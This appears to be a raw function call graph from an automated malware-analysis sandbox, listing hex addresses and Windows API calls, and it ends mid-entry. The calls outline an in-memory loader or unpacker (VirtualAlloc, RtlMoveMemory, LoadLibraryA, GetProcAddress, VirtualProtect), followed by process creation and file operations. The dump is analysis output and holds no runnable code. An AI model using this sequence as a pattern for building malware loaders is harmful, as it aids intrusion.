2a3092 6402->6122 6404 2a7c80 6403->6404 6405 2a7d97 6404->6405 6406 2a7ddd 6404->6406 6407 2a3f00 GetPEB 6404->6407 6410 2a3e60 GetPEB 6404->6410 6405->6125 6408 2a3f00 GetPEB 6406->6408 6412 2a7dfd 6406->6412 6407->6404 6409 2a7df1 6408->6409 6411 2a3e60 GetPEB 6409->6411 6410->6404 6411->6412 6412->6125 6425 2a3910 6413->6425 6414 2a3a3b FindFirstFileW 6417 2a3b8f 6414->6417 6414->6425 6415 2a3ac1 6415->6402 6416 2a3b70 6416->6417 6418 2a3f00 GetPEB 6416->6418 6417->6402 6419 2a3b83 6418->6419 6420 2a3e60 GetPEB 6419->6420 6420->6417 6421 2a34c0 GetPEB 6421->6425 6422 2a3e60 GetPEB 6422->6425 6423 2a3f00 GetPEB 6423->6425 6424 2a38f0 GetPEB 6424->6425 6425->6414 6425->6415 6425->6416 6425->6421 6425->6422 6425->6423 6425->6424 6426 2a3460 GetPEB 6425->6426 6426->6425 6428 2a37ab 6427->6428 6429 2a3795 6427->6429 6433 2a37dd 6428->6433 6434 2a3f00 GetPEB 6428->6434 6430 2a3f00 GetPEB 6429->6430 6431 2a379f 6430->6431 6432 2a3e60 GetPEB 6431->6432 6432->6428 6437 2a3812 6433->6437 6438 2a3f00 GetPEB 6433->6438 6435 2a37d1 6434->6435 6436 2a3e60 GetPEB 6435->6436 6436->6433 6441 2a384a 6437->6441 6442 2a3f00 GetPEB 6437->6442 6439 2a3806 6438->6439 6440 2a3e60 GetPEB 6439->6440 6440->6437 6445 2a3876 6441->6445 6446 2a3f00 GetPEB 6441->6446 6443 2a383e 6442->6443 6444 2a3e60 GetPEB 6443->6444 6444->6441 6449 2a38d1 SHFileOperationW 6445->6449 6450 2a3f00 GetPEB 6445->6450 6447 2a386a 6446->6447 6448 2a3e60 GetPEB 6447->6448 6448->6445 6449->6133 6451 2a38c0 6450->6451 6452 2a3e60 GetPEB 6451->6452 6453 2a38cc 6452->6453 6453->6449 6461 2a1fd2 6454->6461 6455 2a2208 6455->6156 6456 2a2212 6456->6455 6457 2a4220 GetPEB 6456->6457 6457->6455 6458 2a42c0 GetPEB 6458->6461 6459 2a3e60 GetPEB 6459->6461 6460 2a3f00 GetPEB 6460->6461 6461->6455 6461->6456 6461->6458 6461->6459 6461->6460 6470 2a1e86 6462->6470 6463 2a1f77 6464 2a3f00 GetPEB 6463->6464 6466 2a1f68 6463->6466 6465 2a1f98 6464->6465 6467 2a3e60 GetPEB 6465->6467 6466->6156 6467->6466 6468 2a3e60 GetPEB 6468->6470 6469 2a3f00 GetPEB 6469->6470 6470->6463 6470->6466 6470->6468 6470->6469 6472 2a5c26 6471->6472 6473 2a5c10 6471->6473 6477 2a3f00 GetPEB 6472->6477 6481 2a5c4e 6472->6481 6474 2a3f00 GetPEB 6473->6474 6475 2a5c1a 6474->6475 6476 2a3e60 GetPEB 6475->6476 6476->6472 6478 2a5c42 6477->6478 6479 2a3e60 GetPEB 6478->6479 6479->6481 6480 2a5cd2 6480->6156 6481->6480 6482 2a5c99 6481->6482 6483 2a3f00 GetPEB 6481->6483 6485 2a5cc1 6482->6485 6487 2a3f00 GetPEB 6482->6487 6484 2a5c8d 6483->6484 6486 2a3e60 GetPEB 6484->6486 6485->6156 6486->6482 6488 2a5cb5 6487->6488 6489 2a3e60 GetPEB 6488->6489 6489->6485 6491 2a1cf0 6490->6491 6494 2a1d06 6490->6494 6492 2a3f00 GetPEB 6491->6492 6493 2a1cfa 6492->6493 6495 2a3e60 GetPEB 6493->6495 6496 2a1dad 6494->6496 6497 2a3f00 GetPEB 6494->6497 6495->6494 6500 2a1de1 6496->6500 6501 2a3f00 GetPEB 6496->6501 6498 2a1da1 6497->6498 6499 2a3e60 GetPEB 6498->6499 6499->6496 6504 2a4ea0 GetPEB 6500->6504 6502 2a1dd5 6501->6502 6503 2a3e60 GetPEB 6502->6503 6503->6500 6505 2a1e15 6504->6505 6505->6156 6513 2a2255 6506->6513 6507 2a229c 6507->6156 6508 2a3f00 GetPEB 6508->6513 6509 2a25be 6510 2a25cd 6509->6510 6512 2a4220 GetPEB 6509->6512 6510->6156 6511 2a3e60 GetPEB 6511->6513 6512->6510 6513->6507 6513->6508 6513->6509 6513->6511 6527 2a2c1a 6514->6527 6515 2a2fcf 6518 2a2fee 6515->6518 6519 2a3f00 GetPEB 6515->6519 6517 2a2cae 6517->6156 6518->6156 6521 2a2fe2 6519->6521 6520 2a34c0 GetPEB 6520->6527 6522 2a3e60 GetPEB 6521->6522 6522->6518 6523 2a3f00 GetPEB 6523->6527 6524 2a3e60 GetPEB 6524->6527 6525 2a4220 GetPEB 6525->6527 6526 2a3460 GetPEB 6526->6527 6527->6515 6527->6517 6527->6520 6527->6523 6527->6524 6527->6525 6527->6526 6566 2a56f0 6527->6566 6575 2a2980 6527->6575 6532 2a4eb6 6529->6532 6530 2a4f3d 6530->6156 6531 2a3f00 GetPEB 6531->6532 6532->6530 6532->6531 6533 2a3e60 GetPEB 6532->6533 6533->6532 6555 2a191f 6534->6555 6535 2a1bc6 6536 2a35c0 GetPEB 6535->6536 6538 2a1bd0 6536->6538 6537 2a1ba4 6537->6156 6539 2a1bf1 6538->6539 6540 2a3f00 GetPEB 6538->6540 6544 2a1c23 6539->6544 6545 2a3f00 GetPEB 6539->6545 6542 2a1be5 6540->6542 6541 2a3e60 GetPEB 6541->6555 6543 2a3e60 GetPEB 6542->6543 6543->6539 6547 2a1c4b 6544->6547 6550 2a3f00 GetPEB 6544->6550 6546 2a1c17 6545->6546 6549 2a3e60 GetPEB 6546->6549 6547->6156 6548 2a3f00 GetPEB 6548->6555 6549->6544 6552 2a1c3f 6550->6552 6551 2a4e30 GetPEB 6551->6555 6553 2a3e60 GetPEB 6552->6553 6553->6547 6555->6535 6555->6537 6555->6541 6555->6548 6555->6551 6588 2a35c0 6555->6588 6557 2a422d 6556->6557 6562 2a4243 6556->6562 6558 2a3f00 GetPEB 6557->6558 6559 2a4237 6558->6559 6560 2a3e60 GetPEB 6559->6560 6560->6562 6561 2a426b 6561->6141 6562->6561 6563 2a3f00 GetPEB 6562->6563 6564 2a425f 6563->6564 6565 2a3e60 GetPEB 6564->6565 6565->6561 6574 2a5701 6566->6574 6567 2a57e3 6569 2a5723 6567->6569 6570 2a3f00 GetPEB 6567->6570 6568 2a3f00 GetPEB 6568->6574 6569->6527 6571 2a57f6 6570->6571 6573 2a3e60 GetPEB 6571->6573 6572 2a3e60 GetPEB 6572->6574 6573->6569 6574->6567 6574->6568 6574->6569 6574->6572 6576 2a29a0 6575->6576 6577 2a2abf 6576->6577 6578 2a3f00 GetPEB 6576->6578 6579 2a3e60 GetPEB 6576->6579 6580 2a3f00 GetPEB 6577->6580 6582 2a2ae4 6577->6582 6583 2a2b0c 6577->6583 6578->6576 6579->6576 6581 2a2ad8 6580->6581 6584 2a3e60 GetPEB 6581->6584 6582->6583 6585 2a3f00 GetPEB 6582->6585 6583->6527 6584->6582 6586 2a2b00 6585->6586 6587 2a3e60 GetPEB 6586->6587 6587->6583 6589 2a35e4 6588->6589 6590 2a3609 6589->6590 6591 2a3f00 GetPEB 6589->6591 6594 2a3f00 GetPEB 6590->6594 6597 2a3631 6590->6597 6592 2a35fd 6591->6592 6593 2a3e60 GetPEB 6592->6593 6593->6590 6595 2a3625 6594->6595 6596 2a3e60 GetPEB 6595->6596 6596->6597 6597->6555 6599 2a5516 6598->6599 6604 2a552c 6598->6604 6600 2a3f00 GetPEB 6599->6600 6601 2a5520 6600->6601 6602 2a3e60 GetPEB 6601->6602 6602->6604 6603 2a5586 6603->6179 6604->6603 6605 2a3f00 GetPEB 6604->6605 6606 2a557a 6605->6606 6607 2a3e60 GetPEB 6606->6607 6607->6603 6616 2aab66 6608->6616 6611 2aab8c 6611->6191 6612 2aac52 6613 2aac71 6612->6613 6614 2a3f00 GetPEB 6612->6614 6617 2aac99 6613->6617 6620 2a3f00 GetPEB 6613->6620 6615 2aac65 6614->6615 6618 2a3e60 GetPEB 6615->6618 6616->6611 6616->6612 6619 2a3f00 GetPEB 6616->6619 6621 2a3e60 GetPEB 6616->6621 6681 2a4b70 6616->6681 6703 2aacd0 6616->6703 6617->6191 6618->6613 6619->6616 6622 2aac8d 6620->6622 6621->6616 6623 2a3e60 GetPEB 6622->6623 6623->6617 6644 2aa189 6624->6644 6625 2aacd0 GetPEB 6625->6644 6626 2aa552 6629 2aa571 6626->6629 6632 2a3f00 GetPEB 6626->6632 6627 2aa439 6627->6191 6635 2aa599 6629->6635 6639 2a3f00 GetPEB 6629->6639 6630 2a4220 GetPEB 6630->6644 6631 2a34c0 GetPEB 6631->6644 6634 2aa565 6632->6634 6633 2a4b70 2 API calls 6633->6644 6637 2a3e60 GetPEB 6634->6637 6635->6191 6636 2a3f00 GetPEB 6636->6644 6637->6629 6640 2aa58d 6639->6640 6642 2a3e60 GetPEB 6640->6642 6641 2a3460 GetPEB 6641->6644 6642->6635 6643 2a3e60 GetPEB 6643->6644 6644->6625 6644->6626 6644->6627 6644->6630 6644->6631 6644->6633 6644->6636 6644->6641 6644->6643 6713 2ab520 6644->6713 6721 2a1150 6644->6721 6664 2aa7c5 6645->6664 6646 2aaa19 6646->6191 6647 2aacd0 GetPEB 6647->6664 6648 2aaa7c GetCurrentProcessId 6648->6664 6649 2aaaec 6658 2aab14 6649->6658 6659 2a3f00 GetPEB 6649->6659 6650 2aaacd 6650->6649 6654 2a3f00 GetPEB 6650->6654 6651 2a4b70 2 API calls 6651->6664 6655 2aaae0 6654->6655 6657 2a3e60 GetPEB 6655->6657 6656 2a42c0 GetPEB 6656->6664 6657->6649 6658->6191 6660 2aab08 6659->6660 6662 2a3e60 GetPEB 6660->6662 6661 2a3e60 GetPEB 6661->6664 6662->6658 6663 2a3f00 GetPEB 6663->6664 6664->6646 6664->6647 6664->6648 6664->6650 6664->6651 6664->6656 6664->6661 6664->6663 6736 2a49a0 6664->6736 6746 2a4850 6664->6746 6666 2aa5ef 6665->6666 6668 2aa731 6666->6668 6669 2aa710 6666->6669 6671 2a3f00 GetPEB 6666->6671 6672 2a42c0 GetPEB 6666->6672 6676 2a3e60 GetPEB 6666->6676 6755 2a4370 6666->6755 6670 2aa750 6668->6670 6673 2a3f00 GetPEB 6668->6673 6669->6191 6677 2aa778 6670->6677 6678 2a3f00 GetPEB 6670->6678 6671->6666 6672->6666 6674 2aa744 6673->6674 6675 2a3e60 GetPEB 6674->6675 6675->6670 6676->6666 6677->6191 6679 2aa76c 6678->6679 6680 2a3e60 GetPEB 6679->6680 6680->6677 6682 2a4b82 6681->6682 6686 2a4b98 6681->6686 6683 2a3f00 GetPEB 6682->6683 6684 2a4b8c 6683->6684 6685 2a3e60 GetPEB 6684->6685 6685->6686 6687 2a4bd7 CreateProcessW 6686->6687 6688 2a3f00 GetPEB 6686->6688 6689 2a4c73 6687->6689 6690 2a4bf7 6687->6690 6691 2a4bc6 6688->6691 6689->6616 6692 2a4bff 6690->6692 6693 2a4c33 6690->6693 6695 2a3f00 GetPEB 6690->6695 6694 2a3e60 GetPEB 6691->6694 6692->6616 6699 2a4c5d 6693->6699 6700 2a3f00 GetPEB 6693->6700 6696 2a4bd2 6694->6696 6697 2a4c27 6695->6697 6696->6687 6698 2a3e60 GetPEB 6697->6698 6698->6693 6699->6616 6701 2a4c51 6700->6701 6702 2a3e60 GetPEB 6701->6702 6702->6699 6710 2aaced 6703->6710 6704 2a34c0 GetPEB 6704->6710 6705 2aaf9f 6706 2aaf37 6705->6706 6707 2a3f00 GetPEB 6705->6707 6706->6616 6708 2aafb2 6707->6708 6711 2a3e60 GetPEB 6708->6711 6709 2a3f00 GetPEB 6709->6710 6710->6704 6710->6705 6710->6706 6710->6709 6712 2a3e60 GetPEB 6710->6712 6711->6706 6712->6710 6720 2ab536 6713->6720 6714 2ab55f 6714->6644 6715 2ab633 6730 2a4fd0 6715->6730 6717 2ab63f 6717->6644 6718 2a3e60 GetPEB 6718->6720 6719 2a3f00 GetPEB 6719->6720 6720->6714 6720->6715 6720->6717 6720->6718 6720->6719 6727 2a1160 6721->6727 6722 2a124c 6723 2a1244 6722->6723 6725 2a3f00 GetPEB 6722->6725 6723->6644 6724 2a3f00 GetPEB 6724->6727 6726 2a125f 6725->6726 6728 2a3e60 GetPEB 6726->6728 6727->6722 6727->6723 6727->6724 6729 2a3e60 GetPEB 6727->6729 6728->6723 6729->6727 6731 2a4ff9 6730->6731 6732 2a500f 6730->6732 6733 2a3f00 GetPEB 6731->6733 6732->6717 6734 2a5003 6733->6734 6735 2a3e60 GetPEB 6734->6735 6735->6732 6745 2a49c0 6736->6745 6737 2a4b37 6738 2a49ea 6737->6738 6739 2a3f00 GetPEB 6737->6739 6738->6664 6741 2a4b4a 6739->6741 6740 2a34c0 GetPEB 6740->6745 6742 2a3e60 GetPEB 6741->6742 6742->6738 6743 2a3e60 GetPEB 6743->6745 6744 2a3f00 GetPEB 6744->6745 6745->6737 6745->6738 6745->6740 6745->6743 6745->6744 6754 2a4870 6746->6754 6747 2a496e 6748 2a492c 6747->6748 6749 2a3f00 GetPEB 6747->6749 6748->6664 6751 2a4981 6749->6751 6750 2a3f00 GetPEB 6750->6754 6752 2a3e60 GetPEB 6751->6752 6752->6748 6753 2a3e60 GetPEB 6753->6754 6754->6747 6754->6748 6754->6750 6754->6753 6756 2a450e 6755->6756 6757 2a4384 6755->6757 6756->6666 6757->6756 6758 2a3f00 GetPEB 6757->6758 6761 2a43d6 6757->6761 6759 2a43ca 6758->6759 6760 2a3e60 GetPEB 6759->6760 6760->6761 6762 2a3f00 GetPEB 6761->6762 6769 2a4436 6761->6769 6774 2a44f4 6761->6774 6763 2a442a 6762->6763 6764 2a3e60 GetPEB 6763->6764 6764->6769 6765 2a44ba 6775 2a4550 6765->6775 6767 2a3f00 GetPEB 6767->6769 6769->6765 6769->6767 6770 2a3e60 GetPEB 6769->6770 6770->6769 6771 2a3f00 GetPEB 6772 2a44e8 6771->6772 6773 2a3e60 GetPEB 6772->6773 6773->6774 6774->6666 6777 2a44d0 6775->6777 6778 2a456b 6775->6778 6776 2a3e60 GetPEB 6776->6778 6777->6771 6777->6774 6778->6776 6778->6777 6779 2a3f00 GetPEB 6778->6779 6779->6778 6788 2a55c6 6780->6788 6781 2a3f00 GetPEB 6781->6788 6782 2a56a8 6783 2a55e8 6782->6783 6784 2a3f00 GetPEB 6782->6784 6783->6213 6785 2a56bb 6784->6785 6787 2a3e60 GetPEB 6785->6787 6786 2a3e60 GetPEB 6786->6788 6787->6783 6788->6781 6788->6782 6788->6783 6788->6786 6797 2a4ca0 6789->6797 6790 2a3f00 GetPEB 6790->6797 6791 2a4d7c 6791->6213 6792 2a4db4 6792->6791 6793 2a3f00 GetPEB 6792->6793 6795 2a4dc7 6793->6795 6794 2a3e60 GetPEB 6794->6797 6796 2a3e60 GetPEB 6795->6796 6796->6791 6797->6790 6797->6791 6797->6792 6797->6794 6799 2a46d7 6798->6799 6804 2a46ed 6798->6804 6800 2a3f00 GetPEB 6799->6800 6801 2a46e1 6800->6801 6802 2a3e60 GetPEB 6801->6802 6802->6804 6803 2a4760 6803->6222 6804->6803 6805 2a3f00 GetPEB 6804->6805 6810 2a4721 6804->6810 6806 2a4715 6805->6806 6808 2a3e60 GetPEB 6806->6808 6807 2a4752 6807->6222 6808->6810 6809 2a3f00 GetPEB 6811 2a4746 6809->6811 6810->6807 6810->6809 6812 2a3e60 GetPEB 6811->6812 6812->6807 6825 2a25f0 6813->6825 6814 2a2771 6814->6246 6815 2a2912 6816 2a2937 6815->6816 6818 2a3f00 GetPEB 6815->6818 6820 2a295f 6816->6820 6823 2a3f00 GetPEB 6816->6823 6817 2a42c0 GetPEB 6817->6825 6819 2a292b 6818->6819 6821 2a3e60 GetPEB 6819->6821 6820->6246 6821->6816 6822 2a3f00 GetPEB 6822->6825 6824 2a2953 6823->6824 6827 2a3e60 GetPEB 6824->6827 6825->6814 6825->6815 6825->6817 6825->6822 6826 2a3e60 GetPEB 6825->6826 6826->6825 6827->6820 6836 2a1010 6828->6836 6829 2a3f00 GetPEB 6829->6836 6830 2a1105 6831 2a103a 6830->6831 6833 2a3f00 GetPEB 6830->6833 6831->6271 6832 2a3e60 GetPEB 6832->6836 6834 2a1118 6833->6834 6835 2a3e60 GetPEB 6834->6835 6835->6831 6836->6829 6836->6830 6836->6831 6836->6832 6838 2a34c0 GetPEB 6837->6838 6839 2a36c4 6838->6839 6840 2a36e5 6839->6840 6841 2a3f00 GetPEB 6839->6841 6844 2a3f00 GetPEB 6840->6844 6846 2a371a 6840->6846 6842 2a36d9 6841->6842 6843 2a3e60 GetPEB 6842->6843 6843->6840 6845 2a370e 6844->6845 6847 2a3e60 GetPEB 6845->6847 6848 2a3742 6846->6848 6849 2a3f00 GetPEB 6846->6849 6847->6846 6851 2a376e 6848->6851 6853 2a3f00 GetPEB 6848->6853 6850 2a3736 6849->6850 6852 2a3e60 GetPEB 6850->6852 6851->6049 6852->6848 6854 2a3762 6853->6854 6855 2a3e60 GetPEB 6854->6855 6855->6851 6862 2a7712 6856->6862 6857 2a77b3 6859 2a77d2 6857->6859 6861 2a3f00 GetPEB 6857->6861 6858 2a34c0 GetPEB 6858->6862 6859->6353 6860 2a78a3 6860->6353 6863 2a77c6 6861->6863 6862->6857 6862->6858 6862->6860 6864 2a3f00 GetPEB 6862->6864 6866 2a3e60 GetPEB 6862->6866 6865 2a3e60 GetPEB 6863->6865 6864->6862 6865->6859 6866->6862 7101 2a9b60 7104 2a9b80 7101->7104 7102 2a9d96 7103 2a9d12 7102->7103 7105 2a3f00 GetPEB 7102->7105 7104->7102 7104->7103 7106 2a9dd0 GetPEB 7104->7106 7109 2a3f00 GetPEB 7104->7109 7110 2a3e60 GetPEB 7104->7110 7107 2a9da9 7105->7107 7106->7104 7108 2a3e60 GetPEB 7107->7108 7108->7103 7109->7104 7110->7104 7111 2a47e0 7112 2a4c80 GetPEB 7111->7112 7113 2a47f5 7112->7113 5818 290170 5819 2901fb 5818->5819 5834 290ad0 5819->5834 5825 2902c4 5871 2906f0 5825->5871 5827 2902d0 5888 2908f0 5827->5888 5829 2902dc 5906 290580 5829->5906 5831 2902e8 5832 2902ef VirtualFree 5831->5832 5833 2902fb 5831->5833 5832->5833 5835 290b2f 5834->5835 5836 290bf0 VirtualAlloc 5835->5836 5839 2902ab 5835->5839 5837 290c1c 5836->5837 5838 290cdb VirtualAlloc 5837->5838 5837->5839 5838->5839 5840 290d60 5839->5840 5841 290d94 5840->5841 5842 290da3 VirtualAlloc RtlMoveMemory 5841->5842 5843 2902b8 5842->5843 5847 290ddb 5842->5847 5850 290400 GetCurrentProcess 5843->5850 5845 290e0d RtlMoveMemory 5845->5847 5846 290e3c VirtualAlloc 5846->5847 5847->5843 5847->5846 5848 290e6a RtlMoveMemory 5847->5848 5849 290e91 RtlFillMemory 5847->5849 5914 291140 lstrcpynW 5847->5914 5848->5843 5848->5847 5849->5843 5849->5847 5915 291140 lstrcpynW 5850->5915 5852 290459 NtQueryInformationProcess 5853 29046f 5852->5853 5856 2904c5 5852->5856 5854 290492 GetProcessHeap RtlAllocateHeap GetCurrentProcess NtQueryInformationProcess 5853->5854 5855 290484 GetProcessHeap HeapFree 5853->5855 5858 290575 5853->5858 5854->5853 5854->5856 5855->5854 5857 2904e5 5856->5857 5921 291140 lstrcpynW 5856->5921 5916 291140 lstrcpynW 5857->5916 5861 2904dc RtlMoveMemory 5861->5857 5862 2904ef RtlMoveMemory 5917 291140 lstrcpynW 5862->5917 5864 290511 RtlMoveMemory 5918 291140 lstrcpynW 5864->5918 5866 290528 RtlMoveMemory 5919 291140 lstrcpynW 5866->5919 5868 29053f RtlMoveMemory 5920 291140 lstrcpynW 5868->5920 5870 29055a RtlMoveMemory 5870->5825 5872 290740 5871->5872 5878 290744 5872->5878 5922 290fb0 5872->5922 5875 2907b5 RtlMoveMemory 5876 290770 5875->5876 5877 2907ff LoadLibraryA 5876->5877 5876->5878 5930 291140 lstrcpynW 5876->5930 5879 2908b9 5877->5879 5882 29080f 5877->5882 5878->5827 5879->5827 5881 29082d RtlMoveMemory 5881->5876 5881->5882 5882->5876 5882->5878 5883 290858 GetProcAddress 5882->5883 5887 290890 RtlMoveMemory 5882->5887 5931 291140 lstrcpynW 5882->5931 5932 291140 lstrcpynW 5882->5932 5883->5878 5883->5882 5885 290872 RtlMoveMemory 5933 291140 lstrcpynW 5885->5933 5887->5878 5887->5882 5889 290934 5888->5889 5890 290fb0 2 API calls 5889->5890 5891 290938 5889->5891 5892 290970 5890->5892 5891->5829 5892->5891 5936 291140 lstrcpynW 5892->5936 5894 2909af RtlMoveMemory 5894->5891 5898 2909c2 5894->5898 5897 2909f6 RtlMoveMemory 5897->5898 5898->5891 5937 291140 lstrcpynW 5898->5937 5938 291140 lstrcpynW 5898->5938 5940 291140 lstrcpynW 5898->5940 5899 290a97 RtlMoveMemory 5899->5898 5900 290aac 5899->5900 5900->5829 5902 290a3e RtlMoveMemory 5902->5891 5903 290a57 5902->5903 5939 291140 lstrcpynW 5903->5939 5905 290a61 RtlMoveMemory 5905->5898 5907 2905bc 5906->5907 5908 2905c0 5907->5908 5912 29069b VirtualProtect 5907->5912 5941 291140 lstrcpynW 5907->5941 5942 291140 lstrcpynW 5907->5942 5908->5831 5910 290617 RtlMoveMemory 5910->5907 5912->5907 5913 2906c6 5912->5913 5913->5831 5914->5845 5915->5852 5916->5862 5917->5864 5918->5866 5919->5868 5920->5870 5921->5861 5924 290fda 5922->5924 5923 29104a 5923->5876 5924->5923 5934 291140 lstrcpynW 5924->5934 5926 291001 5935 291140 lstrcpynW 5926->5935 5928 29101b RtlMoveMemory 5929 291029 5928->5929 5929->5876 5930->5875 5931->5881 5932->5885 5933->5882 5934->5926 5935->5928 5936->5894 5937->5897 5938->5902 5939->5905 5940->5899 5941->5910 5942->5907 6867 2a4b70 6868 2a4b82 6867->6868 6872 2a4b98 6867->6872 6869 2a3f00 GetPEB 6868->6869 6870 2a4b8c 6869->6870 6871 2a3e60 GetPEB 6870->6871 6871->6872 6873 2a4bd7 CreateProcessW 6872->6873 6874 2a3f00 GetPEB 6872->6874 6875 2a4c73 6873->6875 6876 2a4bf7 6873->6876 6877 2a4bc6 6874->6877 6878 2a4bff 6876->6878 6879 2a4c33 6876->6879 6881 2a3f00 GetPEB 6876->6881 6880 2a3e60 GetPEB 6877->6880 6885 2a4c5d 6879->6885 6886 2a3f00 GetPEB 6879->6886 6882 2a4bd2 6880->6882 6883 2a4c27 6881->6883 6882->6873 6884 2a3e60 GetPEB 6883->6884 6884->6879 6887 2a4c51 6886->6887 6888 2a3e60 GetPEB 6887->6888 6888->6885 6917 2a78b0 6927 2a7990 6917->6927 6918 2a7c1e 6920 2a7c3d 6918->6920 6922 2a3f00 GetPEB 6918->6922 6919 2a34c0 GetPEB 6919->6927 6921 2a7c05 6923 2a7c31 6922->6923 6924 2a3e60 GetPEB 6923->6924 6924->6920 6925 2a3e60 GetPEB 6925->6927 6926 2a3f00 GetPEB 6926->6927 6927->6918 6927->6919 6927->6921 6927->6925 6927->6926 6934 2a7fb0 6935 2a34c0 GetPEB 6934->6935 6936 2a7fc2 6935->6936 6937 2a3f00 GetPEB 6936->6937 6938 2a7fe3 6936->6938 6939 2a7fd7 6937->6939 6940 2a8029 6938->6940 6942 2a3f00 GetPEB 6938->6942 6941 2a3e60 GetPEB 6939->6941 6945 2a8051 6940->6945 6946 2a3f00 GetPEB 6940->6946 6941->6938 6943 2a801d 6942->6943 6944 2a3e60 GetPEB 6943->6944 6944->6940 6948 2a807d 6945->6948 6950 2a3f00 GetPEB 6945->6950 6947 2a8045 6946->6947 6949 2a3e60 GetPEB 6947->6949 6949->6945 6951 2a8071 6950->6951 6952 2a3e60 GetPEB 6951->6952 6952->6948 6953 2a64b0 6954 2a64ba 6953->6954 6959 2a64d0 6953->6959 6955 2a3f00 GetPEB 6954->6955 6956 2a64c4 6955->6956 6957 2a3e60 GetPEB 6956->6957 6957->6959 6958 2a659a 6959->6958 6960 2a42c0 GetPEB 6959->6960 6961 2a657b 6960->6961 6961->6958 6963 2a4160 6961->6963 6964 2a4172 6963->6964 6965 2a4180 6963->6965 6966 2a3f00 GetPEB 6964->6966 6965->6958 6967 2a4177 6966->6967 6968 2a3e60 GetPEB 6967->6968 6968->6965 7130 2a4df0 GetPEB 6969 2a6208 6977 2a6202 6969->6977 6970 2a55b0 GetPEB 6970->6977 6971 2a4c80 GetPEB 6971->6977 6972 2a42c0 GetPEB 6972->6977 6973 2a624b 6974 2a3f00 GetPEB 6974->6977 6975 2a6490 6976 2a3f00 GetPEB 6979 2a642d 6976->6979 6977->6970 6977->6971 6977->6972 6977->6973 6977->6974 6978 2a3e60 GetPEB 6977->6978 6977->6979 6978->6977 6979->6975 6979->6976 6980 2a3e60 GetPEB 6979->6980 6980->6979 6981 2a6608 7023 2a65fd 6981->7023 6982 2a94d0 GetPEB 6982->7023 6983 2a8bb0 2 API calls 6983->7023 6984 2a706e 6993 2a8740 3 API calls 6984->6993 6985 2a9f30 GetPEB 6985->7023 6986 2a68df 6987 2a6dcd 6994 2ab2e0 GetPEB 6987->6994 6988 2a7410 GetPEB 6988->7023 6989 2a7061 7001 2a8d40 2 API calls 6989->7001 6990 2a72d0 GetPEB 6990->7023 6991 2a9050 GetPEB 6991->7023 6992 2ab1d0 GetPEB 6992->7023 7003 2a7073 6993->7003 6994->6986 6995 2a53d0 GetPEB 6995->7023 6996 2a6f27 GetTickCount 6996->7023 6997 2a9270 GetPEB 6997->7023 6998 2a7120 3 API calls 6998->7023 6999 2a8700 GetPEB 6999->7023 7000 2a9860 6 API calls 7000->7023 7010 2a7066 7001->7010 7002 2a61e0 GetPEB 7002->7023 7004 2a80a0 2 API calls 7004->7023 7005 2a3e60 GetPEB 7005->7023 7006 2a12b0 2 API calls 7006->7023 7007 2ab430 3 API calls 7007->7023 7008 2a8970 2 API calls 7008->7023 7009 2a3f00 GetPEB 7009->7023 7011 2a4770 2 API calls 7011->7023 7012 2a3310 GetPEB 7012->7023 7013 2a4220 GetPEB 7013->7023 7014 2a6060 GetPEB 7014->7023 7015 2a8400 2 API calls 7015->7023 7016 2a8e80 2 API calls 7016->7023 7017 2a9620 2 API calls 7017->7023 7018 2a6975 GetTickCount 7018->7023 7019 2a1840 GetPEB 7019->7023 7020 2a3460 GetPEB 7020->7023 7021 2aafe0 GetPEB 7021->7023 7022 2a4160 GetPEB 7022->7023 7023->6982 7023->6983 7023->6984 7023->6985 7023->6986 7023->6987 7023->6988 7023->6989 7023->6990 7023->6991 7023->6992 7023->6995 7023->6996 7023->6997 7023->6998 7023->6999 7023->7000 7023->7002 7023->7004 7023->7005 7023->7006 7023->7007 7023->7008 7023->7009 7023->7011 7023->7012 7023->7013 7023->7014 7023->7015 7023->7016 7023->7017 7023->7018 7023->7019 7023->7020 7023->7021 7023->7022 5969 2a3780 5970 2a37ab 5969->5970 5971 2a3795 5969->5971 5975 2a37dd 5970->5975 5976 2a3f00 GetPEB 5970->5976 5972 2a3f00 GetPEB 5971->5972 5973 2a379f 5972->5973 5974 2a3e60 GetPEB 5973->5974 5974->5970 5979 2a3812 5975->5979 5980 2a3f00 GetPEB 5975->5980 5977 2a37d1 5976->5977 5978 2a3e60 GetPEB 5977->5978 5978->5975 5983 2a384a 5979->5983 5984 2a3f00 GetPEB 5979->5984 5981 2a3806 5980->5981 5982 2a3e60 GetPEB 5981->5982 5982->5979 5987 2a3876 5983->5987 5988 2a3f00 GetPEB 5983->5988 5985 2a383e 5984->5985 5986 2a3e60 GetPEB 5985->5986 5986->5983 5991 2a38d1 SHFileOperationW 5987->5991 5992 2a3f00 GetPEB 5987->5992 5989 2a386a 5988->5989 5990 2a3e60 GetPEB 5989->5990 5990->5987 5993 2a38c0 5992->5993 5994 2a3e60 GetPEB 5993->5994 5995 2a38cc 5994->5995 5995->5991 7036 2a2b80 7037 2a2b99 7036->7037 7038 2a2baf 7036->7038 7039 2a3f00 GetPEB 7037->7039 7040 2a2ba3 7039->7040 7041 2a3e60 GetPEB 7040->7041 7041->7038 7137 2a7e40 7139 2a7e50 7137->7139 7138 2a7f83 7141 2a38f0 2 API calls 7138->7141 7139->7138 7140 2a7f7a 7139->7140 7143 2a34c0 GetPEB 7139->7143 7144 2a3e60 GetPEB 7139->7144 7145 2a3f00 GetPEB 7139->7145 7142 2a7f96 7141->7142 7143->7139 7144->7139 7145->7139 7057 2aa198 7077 2aa189 7057->7077 7058 2aacd0 GetPEB 7058->7077 7059 2aa552 7064 2a3f00 GetPEB 7059->7064 7065 2aa571 7059->7065 7060 2aa439 7061 2a1150 GetPEB 7061->7077 7062 2a4220 GetPEB 7062->7077 7063 2a34c0 GetPEB 7063->7077 7067 2aa565 7064->7067 7068 2aa599 7065->7068 7072 2a3f00 GetPEB 7065->7072 7066 2a4b70 2 API calls 7066->7077 7069 2a3e60 GetPEB 7067->7069 7069->7065 7070 2ab520 GetPEB 7070->7077 7071 2a3f00 GetPEB 7071->7077 7073 2aa58d 7072->7073 7075 2a3e60 GetPEB 7073->7075 7074 2a3460 GetPEB 7074->7077 7075->7068 7076 2a3e60 GetPEB 7076->7077 7077->7058 7077->7059 7077->7060 7077->7061 7077->7062 7077->7063 7077->7066 7077->7070 7077->7071 7077->7074 7077->7076 7146 2a1fd8 7153 2a1fd2 7146->7153 7147 2a2208 7148 2a2212 7148->7147 7149 2a4220 GetPEB 7148->7149 7149->7147 7150 2a42c0 GetPEB 7150->7153 7151 2a3f00 GetPEB 7151->7153 7152 2a3e60 GetPEB 7152->7153 7153->7147 7153->7148 7153->7150 7153->7151 7153->7152 7078 